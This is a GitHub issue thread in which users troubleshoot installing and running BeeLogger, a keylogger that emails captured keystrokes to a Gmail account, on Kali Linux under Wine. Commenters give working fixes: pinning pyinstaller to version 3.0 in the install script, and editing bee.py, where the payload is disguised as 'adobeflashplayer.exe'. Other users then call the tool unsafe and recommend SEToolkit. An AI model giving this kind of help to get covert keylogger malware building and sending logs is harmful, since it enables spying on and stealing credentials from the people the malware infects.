### ISSUE TITLE
Kali Linux 2021.1 not working

### ISSUE THREAD

**Issue by MrMoon-San** [4w4k3/BeeLogger#95]
Hi!

I have Kali Linux 2021.1 on VMWare, and I’m logged in as root…
In the console I type:
`git clone https://github.com/4w4k3/BeeLogger.git
cd BeeLogger
chmod +x install.sh
./install.sh`
Then there’s Python instalator - I click on OK, Next several times and Finish
Then there’s pywin32-220 - Next several times and Finish again
Then there’s pyHook-1.5.1 - Next several times and Finish
After doing that I have SyntaxError:
`Complete output from command python setyp.py egg_info:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "c:\users\root\temp\pip-build-vowhya\pyinstaller\setup.py", line 63
file = sys.stderr)

SyntaxError: invalid syntax

Command "python setup.py egg_info" failed with error code 1 in c:\users\root\temp\pip-build-vowhya\pyinstaller`
And also during the installation process there are the following errors:
`002f:err:mscoree:LoadLibraryShim error reading registry key for installroot

//and also

0012:err:ole //etc`
So basically what I’m asking for is a good tutorial on how to install BeeLogger on Kali Linux 2021.1 VMWare without errors

I’ll be thankful for any help 

(+ I’m not intending to use BeeLogger in malicious purposes)

**Comment by w4rr10r1201** [comment]
I have same error, basically the error occurs when you try to install pyinstaller it get's the latest version. This version is not compatible with python 2.7.

In the `install.sh` script, on line 6, I put version 3.0 on pyinstaller and works fine, just like this:

`wine /root/.wine/drive_c/Python27/python.exe -m pip install pyinstaller==3.0`

Another issues like this maybe can solve like describe above (just as the user @slipknot64 describe on issue #92

**Comment by tenebris01** [comment]
@w4rr10r1201 its working! i l0ve u

**Comment by MrMoon-San** [comment]
@w4rr10r1201 
Thanks - it worked... But now I have another problem. BeeLogger is not sending logs :(
I typed both Gmail and password correctly, and I'm not receiving any logs...
Could you help me with that one, @w4rr10r1201 ?
I'll be thankful

**Comment by YaminiRam2020** [comment]
in Templete/bee.py file 


after 
dir = r"C:\Users\Public\Libraries\adobeflashplayer.exe"
lastWindow = ''                                  (both single quotes without space) 

Now you will start receiving logs

**Comment by MrMoon-San** [comment]
@YaminiRam2020
Well it still does not send anything and I got an alert saying, that someone tried to log in to my account...
Is it fine or should I worry..?

**Comment by deeplinux2003** [comment]
> @w4rr10r1201 its working! i l0ve u

bro please explain me how to do it i am also facing the same problem pls help

**Comment by MrMoon-San** [comment]
Okay - don't use BeeLogger
Use SEToolkit instead (BeeLogger is unsafe)
@deeplinux2003 @tenebris01

**Comment by deeplinux2003** [comment]
> Okay - don't use BeeLogger
> Use SEToolkit instead (BeeLogger is unsafe)
> @deeplinux2003 @tenebris01

Okay thank you sir 😇
